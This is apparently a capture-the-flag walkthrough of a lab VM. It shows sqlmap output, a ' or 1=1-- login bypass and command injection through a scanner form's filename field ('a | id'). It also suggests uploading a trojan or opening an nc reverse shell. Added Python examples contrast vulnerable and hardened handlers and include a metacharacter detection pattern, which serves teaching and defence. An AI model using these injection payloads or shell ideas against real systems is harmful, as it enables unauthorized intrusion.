┌──(kali㉿kali)-[~/workspace]
└─$ sqlmap -r testsql.txt -f --level 4 --risk 3
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.10#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:18:43 /2022-10-23/

[15:18:43] [INFO] parsing HTTP request from 'testsql.txt'
[15:18:43] [INFO] testing connection to the target URL
[15:18:44] [INFO] testing if the target URL content is stable
[15:18:44] [INFO] target URL content is stable
[15:18:44] [INFO] testing if POST parameter 'password' is dynamic
[15:18:44] [WARNING] POST parameter 'password' does not appear to be dynamic
[15:18:44] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[15:18:45] [INFO] testing for SQL injection on POST parameter 'password'
[15:18:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:18:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
got a refresh intent (redirect like response common to login pages) to '/scan'. Do you want to apply it from now on? [Y/n] Y
[15:18:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable
[15:18:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite'
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (4) value? [Y/n] Y
[15:19:14] [INFO] testing 'Generic inline queries'
[15:19:14] [INFO] testing 'SQLite inline queries'
[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[15:19:14] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[15:19:14] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
[15:20:15] [INFO] POST parameter 'password' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
[15:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
- From this output we can see that an injection point exists and that the DBMS is probably SQLite.
- The line
  [15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable
  tells us the injection type: OR boolean-based.
- For an OR boolean-based injection we can try the fairly generic payload " or 1=1-- as the value of the password field in the form at http://192.168.56.109:8080/ and submit the form; the login responds with a redirect to http://192.168.56.109:8080/scan.
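Why the login check falls to an OR boolean-based payload, and what the fix looks like, as an added example that is not code from the VM or from the original post. The user table, the credentials and both login functions are constructed for the demonstration; the quote character in the payload has to match the one the application puts around the value, and since this constructed app quotes with single quotes the payload here is ' or 1=1-- rather than the " or 1=1-- used against the target above.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the app's user table.

    The VM's real schema is not on the page; one row is enough to show the effect.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def build_vulnerable_sql(username, password):
    """Statement text the vulnerable check executes: input spliced into SQL."""
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(conn, username, password):
    """Hypothetical login check that concatenates user input into the query.

    With password = "' or 1=1--" the statement becomes
      ... WHERE username = 'nobody' AND password = '' or 1=1--'
    The closing quote ends the literal early, 'or 1=1' makes the WHERE clause
    true for every row, and '--' comments out the leftover quote. Any row
    satisfying the condition counts as a successful login, which is the
    'OR boolean-based' behaviour sqlmap reported.
    """
    row = conn.execute(build_vulnerable_sql(username, password)).fetchone()
    return row is not None


def login_parameterized(conn, username, password):
    """Same check with bound parameters.

    The input is handed to SQLite as a value, never as SQL text, so the payload
    is simply compared against the stored password and does not match.
    """
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row is not None


def demo():
    """Run the three cases that matter and return their outcomes."""
    conn = make_db()
    payload = "' or 1=1--"
    return {
        "vulnerable_with_payload": login_vulnerable(conn, "nobody", payload),
        "parameterized_with_payload": login_parameterized(conn, "nobody", payload),
        "parameterized_real_creds": login_parameterized(conn, "admin", "correct-horse"),
    }


if __name__ == "__main__":
    print(build_vulnerable_sql("nobody", "' or 1=1--"))
    print(demo())
```

The parameterized version is the only change needed on the application side; the rest of the walkthrough (sqlmap's blind detection, the redirect to /scan) would simply not happen because the login would always return "no match" for a bad password.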
- A quick look around shows that the http://192.168.56.109:8080/scan page is the web application's back-end admin page. It accepts submitted data, and the hint "Try scanning some of these files with our scanner!" tells us that whatever is submitted is handed to some scanning program, most likely by running a command in a shell:
<html><body><h1>Cloud Anti-Virus Scanner!</h1><h3>Try scanning some of these files with our scanner!</h3><pre>total 4756
-rwxr-xr-x 1 scanner scanner 1113504 Oct 21  2018 bash
-rwxr-xr-x 1 scanner scanner   34888 Oct 21  2018 bzip2
-rwxr-xr-x 1 scanner scanner   35064 Oct 21  2018 cat
-rw-rw-r-- 1 scanner scanner      68 Oct 21  2018 eicar
-rw-rw-r-- 1 scanner scanner       5 Oct 21  2018 hello
-rwxr-xr-x 1 scanner scanner   35312 Oct 21  2018 netcat
-rwxr-xr-x 1 scanner scanner 3633560 Oct 21  2018 python</pre><form action="/output" method="POST"><input type="filename" name="filename" placeholder="File Name"><input type="submit" value="Scan!"></form></body></html>
- We can try the | pipe to chain commands, which changes the returned content and lets us mix in the information we want. Submitting
  a | id
  gives the result below, which shows that the input is not filtered and that we can execute commands through it:
  uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)
- Through this vulnerability we can build an input of the form
  a | ls | grep 'xxxxx' | <command to run>
- We can check whether wget is present; it would help upload a trojan to use together with Metasploit.
- We can also use nc to get a reverse shell by running the commands below in turn, but the nc version listed above is not well suited to it; it can still be done with nc, just with more hassle.
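The scanner endpoint's flaw, shown from the application side, as an added example that is not code from the VM or from the original post: a handler that builds one shell string from the filename field beside the same handler with a filename allowlist and no shell. The directory, the stand-in scanner command (wc -c instead of the real anti-virus binary) and the function names are constructed for the demonstration; only the file name hello with its 5-byte size is taken from the listing on the page.

```python
import os
import re
import subprocess
import tempfile

# Allowlist for names the scanner endpoint accepts: plain file names only,
# no path separators, spaces or shell metacharacters (constructed policy).
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]+$")

# Characters worth flagging in web logs for this parameter (constructed list).
SHELL_META = re.compile(r"[|;&`$()<>\n]")


def setup_sandbox():
    """Create a constructed stand-in for the scanner's file directory.

    Only 'hello' (5 bytes, as in the listing on the page) is created.
    """
    base = tempfile.mkdtemp(prefix="scanner-")
    with open(os.path.join(base, "hello"), "w") as fh:
        fh.write("hello")
    return base


def scan_vulnerable(base, filename):
    """Hypothetical handler for POST /output that builds one shell command.

    'wc -c' stands in for the scanner binary. Because the whole string is given
    to /bin/sh, a filename such as 'a | id' becomes a pipeline and 'id' runs.
    """
    cmd = "wc -c " + os.path.join(base, filename)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def scan_hardened(base, filename):
    """Same handler with two fixes: validate the name, then run without a shell."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError("rejected filename: disallowed characters")
    # Second gate: the name must be an existing regular file directly under base,
    # so nothing outside the scan directory is reachable even if the regex is
    # ever loosened.
    path = os.path.join(base, filename)
    if filename not in os.listdir(base) or not os.path.isfile(path):
        raise ValueError("rejected filename: not in the scan directory")
    # argv list, no shell: the filename is one argument and is never parsed
    # for '|' or any other operator.
    proc = subprocess.run(["wc", "-c", path], capture_output=True, text=True, check=True)
    return proc.stdout


def rejected(base, filename):
    """True when the hardened handler refuses the name (used for checks below)."""
    try:
        scan_hardened(base, filename)
    except ValueError:
        return True
    return False


def classify_filename(filename):
    """Cheap log-side triage for the filename parameter: flag metacharacters."""
    return "suspicious" if SHELL_META.search(filename) else "plain"


if __name__ == "__main__":
    base = setup_sandbox()
    print("vulnerable, hello :", scan_vulnerable(base, "hello").strip())
    print("vulnerable, a | id:", scan_vulnerable(base, "a | id").strip())
    print("hardened, hello   :", scan_hardened(base, "hello").strip())
    print("hardened, a | id  :", "rejected" if rejected(base, "a | id") else "accepted")
```

Both gates matter: the allowlist regex stops the pipe, semicolon and $() forms at the door, and passing an argv list instead of a string means that even an unexpected name can never be interpreted by a shell. classify_filename is the detection counterpart: the same metacharacters, applied to the request log, surface the probing shown above.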